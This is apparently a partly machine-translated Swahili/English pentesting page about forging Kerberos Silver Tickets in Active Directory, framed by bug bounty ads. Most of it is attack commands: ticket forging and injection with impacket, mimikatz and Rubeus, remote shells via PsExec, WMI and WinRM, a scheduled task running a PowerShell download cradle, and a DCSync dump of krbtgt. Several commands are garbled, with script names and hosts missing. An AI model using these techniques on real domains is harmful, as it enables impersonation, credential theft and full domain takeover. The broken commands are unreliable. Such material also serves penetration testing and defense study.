Silver Ticket

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Bug bounty tip: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi kwenye leo, na uanze kupata zawadi hadi $100,000!

Silver ticket

Shambulio la Silver Ticket linahusisha unyakuzi wa tiketi za huduma katika mazingira ya Active Directory (AD). Njia hii inategemea kupata hash ya NTLM ya akaunti ya huduma, kama akaunti ya kompyuta, ili kutunga tiketi ya Ticket Granting Service (TGS). Kwa tiketi hii iliyotungwa, mshambuliaji anaweza kufikia huduma maalum kwenye mtandao, akijifanya kuwa mtumiaji yeyote, kwa kawaida akilenga haki za usimamizi. Inasisitizwa kwamba kutumia funguo za AES kwa kutunga tiketi ni salama zaidi na ngumu kugundulika.

Kwa ajili ya kutunga tiketi, zana tofauti zinatumika kulingana na mfumo wa uendeshaji:

On Linux

python -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python <DOMAIN>/<USER>@<TARGET> -k -no-pass

Kwenye Windows

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries.

Available Services

Using Rubeus you may ask for all these tickets using the parameter:

  • /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silver tickets Event IDs

  • 4624: Account Logon

  • 4634: Account Logoff

  • 4672: Admin Logon

Abusing Service tickets

In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.


With this ticket you will be able to access the C$ and ADMIN$ folder via SMB (if they are exposed) and copy files to a part of the remote filesystem just doing something like:

dir \\\C$
dir \\\ADMIN$
copy afile.txt \\\C$\Windows\Temp

You will also be able to obtain a shell inside the host or execute arbitrary commands using psexec:


With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"


Kwa tiketi hizi unaweza kutekeleza WMI katika mfumo wa mwathirika:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic list full /format:list

Pata maelezo zaidi kuhusu wmiexec katika ukurasa ufuatao:


Kwa ufikiaji wa winrm juu ya kompyuta unaweza kuipata na hata kupata PowerShell:

New-PSSession -Name PSC -ComputerName; Enter-PSSession PSC

Check the following page to learn njia zaidi za kuungana na mwenyeji wa mbali kwa kutumia winrm:

Note that winrm lazima iwe hai na inasikiliza kwenye kompyuta ya mbali ili kuweza kuipata.


With this privilege you can dump the DC database using DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Jifunze zaidi kuhusu DCSync katika ukurasa ufuatao:


Usanidi wa bug bounty: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi katika leo, na anza kupata zawadi hadi $100,000!

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